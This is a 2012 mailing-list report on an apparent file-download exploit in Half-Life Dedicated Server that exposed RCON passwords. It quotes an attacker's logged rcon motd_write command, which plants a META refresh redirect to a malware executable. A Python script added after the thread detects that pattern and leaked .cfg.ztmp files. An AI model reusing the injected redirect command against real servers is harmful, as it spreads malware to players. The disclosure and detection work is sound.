This was already fixed in an update, apparently.

On 7/3/2012 2:54 PM, c0m4r wrote:

There is an exploit in q3 engine named "q3dirtrav", which allows players to download any of server files, including server configuration (server.cfg).

Today I found evidence of possible existence of the same exploit in HLDS.

As a company we host hundreds of servers. We received many reports from our customers about strange HTTP refresh meta tag in the motd.txt of their servers, which leads to "http *//free -leaks *com/cstrike*exe".

The problem has affected several different servers, unrelated to each other, with very different RCON passwords (but most were very strong).

Here's what I have found in logfiles:

Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">

This "cstrike.exe" contains some kind of a virus.

(Note: I've replaced dot with asterisk and spaces)

As you can see the attacker knew the RCON password of each server.

Then I found "server.CFG.ztmp" file in cstrike of each server, which was attacked.

For me that means that the attacker was able to download server.cfg exactly the same way as maps, models or sounds.

_______________________________________________
To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
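A check for the two indicators described in the quoted message (an rcon `motd_write` carrying a META refresh tag, and a `.cfg` file with a `.ztmp` suffix in the game directory), as an added example that is not part of the original thread. The log line shape follows the excerpt quoted in the message; the sample lines, addresses, password, host and file names are constructed, and the function names are hypothetical.

```python
import re
from pathlib import PurePosixPath

# Line shape follows the excerpt quoted in the message:
#   Rcon from <ip>:<port>:rcon <challenge> <password> <command ...>
RCON_RE = re.compile(
    r"Rcon from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+:\s*"
    r"rcon -?\d+ (?P<password>\S+) (?P<command>.*)$"
)
META_REFRESH_RE = re.compile(r"<\s*meta[^>]*http-equiv\s*=\s*[\"']?refresh", re.I)

def scan_rcon_log(lines):
    """Flag rcon motd_write commands whose payload holds a META refresh tag."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = RCON_RE.search(line)
        if not m:
            continue
        command = m.group("command")
        if command.startswith("motd_write") and META_REFRESH_RE.search(command):
            # Cut the password out by position so it never reaches an alert.
            redacted = line[:m.start("password")] + "<redacted>" + line[m.end("password"):]
            findings.append({"line": lineno, "source_ip": m.group("ip"), "redacted": redacted})
    return findings

def leaked_config_temp_files(filenames):
    """Return names shaped like <something>.cfg.ztmp (case-insensitive)."""
    hits = []
    for name in filenames:
        suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
        if suffixes[-2:] == [".cfg", ".ztmp"]:
            hits.append(name)
    return hits

# Constructed sample data: documentation addresses, placeholder password and host.
SAMPLE_LOG = [
    "Rcon from 192.0.2.10:27005:rcon 1111111111 hunter2example status",
    "Rcon from 198.51.100.7:15518:rcon 2222222222 hunter2example motd_write "
    '<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://download.example.invalid/file.exe">',
    "Rcon from 192.0.2.10:27005:rcon 1111111111 hunter2example motd_write Welcome!",
]
SAMPLE_FILES = ["cstrike/maps/de_dust2.bsp.ztmp", "cstrike/server.CFG.ztmp", "cstrike/server.cfg"]

if __name__ == "__main__":
    for finding in scan_rcon_log(SAMPLE_LOG):
        print(finding["line"], finding["source_ip"], finding["redacted"])
    print(leaked_config_temp_files(SAMPLE_FILES))
```

A hit from either function on a server is a reason to rotate its RCON password and restore motd.txt from a known-good copy.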

